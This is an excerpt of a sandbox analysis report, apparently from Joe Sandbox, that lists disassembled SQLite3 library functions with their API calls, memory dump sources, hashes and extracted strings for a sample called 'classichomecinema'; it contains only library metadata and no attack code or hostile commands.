                                                                                        • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                        • API String ID: 0-2604012851
                                                                                        • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                        • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                        • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                        • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmp$sqlite3_logsqlite3_mutex_try
                                                                                        • String ID: 0$SQLite format 3
                                                                                        • API String ID: 3174206576-3388949527
                                                                                        • Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                        • Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
                                                                                        • Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                        • Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
                                                                                        APIs
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                        • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                        • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                          • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                          • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                        • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                        • String ID: |
                                                                                        • API String ID: 1576672187-2343686810
                                                                                        • Opcode ID: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                                        • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                        • Opcode Fuzzy Hash: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                                        • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                        APIs
                                                                                        • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                          • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                        • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                        • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                        • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                        • API String ID: 652164897-1572359634
                                                                                        • Opcode ID: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                                        • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                        • Opcode Fuzzy Hash: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                                        • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                                        APIs
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                                        • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                                        • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                                        • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                        • String ID:
                                                                                        • API String ID: 2352520524-0
                                                                                        • Opcode ID: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                                        • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                                        • Opcode Fuzzy Hash: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                                        • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                                        APIs
                                                                                          • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                          • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                          • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                          • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                        • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                          • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                          • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                          • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                                        • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                                        • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                        • String ID: optimize
                                                                                        • API String ID: 3659050757-3797040228
                                                                                        • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                        • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                                        • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                        • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                                        APIs
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                                        • sqlite3_reset.SQLITE3 ref: 60965556
                                                                                        • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                        • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                                        • sqlite3_free.SQLITE3 ref: 60965714
                                                                                        • sqlite3_free.SQLITE3 ref: 6096574B
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        • sqlite3_free.SQLITE3 ref: 609657AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 2722129401-0
                                                                                        • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                        • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                                        • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                        • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                                        APIs
                                                                                        • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                          • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                                        • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                          • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                                        • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        • sqlite3_free.SQLITE3 ref: 6096477B
                                                                                        • sqlite3_free.SQLITE3 ref: 60964783
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                                        • String ID:
                                                                                        • API String ID: 571598680-0
                                                                                        • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                        • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                                        • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                        • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                                        APIs
                                                                                        • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                          • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                                        • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                                        • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                        • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                        • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                        • sqlite3_free.SQLITE3 ref: 60963621
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                                        • String ID:
                                                                                        • API String ID: 4276469440-0
                                                                                        • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                        • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                                        • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                        • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                                        APIs
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                        Strings
                                                                                        • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                        • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                        • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                        • API String ID: 4080917175-264706735
                                                                                        • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                        • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                                        • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                        • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                                        APIs
                                                                                          • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                        • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                        • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID: library routine called out of sequence$out of memory
                                                                                        • API String ID: 2019783549-3029887290
                                                                                        • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                        • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                                        • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                        • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                                        APIs
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609406E3
                                                                                          • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                                          • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                                        • sqlite3_free.SQLITE3 ref: 609406F7
                                                                                        • sqlite3_free.SQLITE3 ref: 60940705
                                                                                        • sqlite3_free.SQLITE3 ref: 60940713
                                                                                        • sqlite3_free.SQLITE3 ref: 6094071E
                                                                                        • sqlite3_free.SQLITE3 ref: 60940729
                                                                                        • sqlite3_free.SQLITE3 ref: 6094073C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_log$sqlite3_finalize
                                                                                        • String ID:
                                                                                        • API String ID: 1159759059-0
                                                                                        • Opcode ID: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                                        • Instruction ID: 8ceab58ab7f3fb7faec85fb80e78016d1f3d655de586deaf1cb04ee1bc4e3406
                                                                                        • Opcode Fuzzy Hash: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                                        • Instruction Fuzzy Hash: C801E8B45447108BDB00AF78C4C5A59BBE5EF79B18F06096DECCA8B305D734D8809B91
                                                                                        APIs
                                                                                        • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                          • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                                        • sqlite3_log.SQLITE3 ref: 609498F5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                        • String ID: List of tree roots: $d$|
                                                                                        • API String ID: 3709608969-1164703836
                                                                                        • Opcode ID: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                                                        • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                                        • Opcode Fuzzy Hash: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                                                        • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                                        APIs
                                                                                          • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                          • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                          • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                          • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                                        • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                                        • sqlite3_free.SQLITE3 ref: 6096029A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
